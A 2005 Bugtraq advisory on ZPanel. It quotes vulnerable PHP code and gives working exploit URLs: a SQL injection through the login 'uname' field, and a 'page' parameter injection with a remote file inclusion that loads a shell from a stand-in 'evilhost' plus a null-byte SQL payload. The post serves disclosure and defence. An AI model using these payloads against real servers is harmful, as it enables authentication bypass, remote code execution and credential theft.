Few remote bugs in zPanel

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Few remote bugs in zPanel
From: Mik- <misha@xxxxxx>
Date: Tue, 15 Mar 2005 12:40:59 +0100 (CET)
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello,

Few bugs have been discovered (accidently) in zPanel.

Developers were notified on 07.March but I have not received anyresponse.


Best regards,                           Mikhail.
-------------------------------------------------------------

[Product Description]

"ZPanel is a hosting control interface developed for both Windows andLinux hosts.We will soon be developing two different distributions to fit the needs ofboth

platforms."
Tested:
ZPanel has been tested on the following server operating systems:
Windows                                 Linux
2000 Advanced Server                    Fedora 2
2000 Server                             FreeBSD 4.9, 5.2.1
2003 Enterprise Server                  Mandrake 9.1, 9.2
XP                                      RedHat 7.3, 9

Versions:
Stable - ZPanel v2.0
Latest Beta - ZPanel v2.5b10

[Summary]

Successful exploitation of an input validation vulnerability in ZPanelscripts

allows attackers to execute SQL commands, include remote and local files,
get sensetive information.

[Details]
[1] SQL injection #1

Vulnarable script: index.php
Vulnerable code:
--[code]--
if (isset($_POST['uname'])) {

        mysql_select_db($database_Customer_Database, $Customer_Database);

$query_TempUser = sprintf("SELECT * FROM custumerbase WHEREservicename = '".$_POST['uname']."'");

--[/code]--

Not sanitizing userinput variable outbounds directly into SQL query.

It is possible to inject arbitrary SQL statements through 'uname' variableand bypass the authentification.

In case of invalid user name or password user can see which parameter iswrong.

As result:
SQL onechar bruteforce technique allows to get sensitive information

(such as nonencrypted passwords in ZPanel v.2, and md5 hashes in ZPanelv.<=2.5 beta 10).


[2] SQL injection #2 and file inclusion

Vulnerable script: zpanel.php
Vulnerable code:
--[code v.2.5 beta]--
if (isset($_GET['page']) && $_GET['page'] != 'main') {

$query_Modules = sprintf("SELECT * FROM modules WHERE name ='".$_GET['page']."'");$Modules = mysql_query($query_Modules, $Customer_Database) ordie(mysql_error());

        $row_Modules = mysql_fetch_assoc($Modules);
[...]
                        if ($row_Modules['active'] == '1') {

$body = "modules/" . $_GET['page'] ."/index.php";

--[/code]--

or

--[code v.2.0]--
if (!isset($_GET['page'])){
        $body = "main.php";
}else{
        $body = $_GET['page'] . ".php";
}
--[/code]--

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1

Path disclosing avaliable in case of unsuccessfull exploitation of thisbug.


[3] Installation
By default, installation scripts are not taken away after installation.

http://localhost/ZPanel/admin/install.php

[4] Old scripts
ZPanel uses old buggy scripts. For example
phpBB Forums 2.0.8a.


[DISCLOSURE TIMELINE]

10-03-2005  Initial vendor notification.

[CREDITS & GREETS]
Goes to GHC & specially to Foster

Prev by Date: Re: PlantinumFTP server <= 1.0.18 Remote DOS exploit
Next by Date: Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access
Previous by thread: Re: SAV9 Functionality Hole - misses virus files
Next by thread: Re: Few remote bugs in zPanel
Index(es):
- Date
- Thread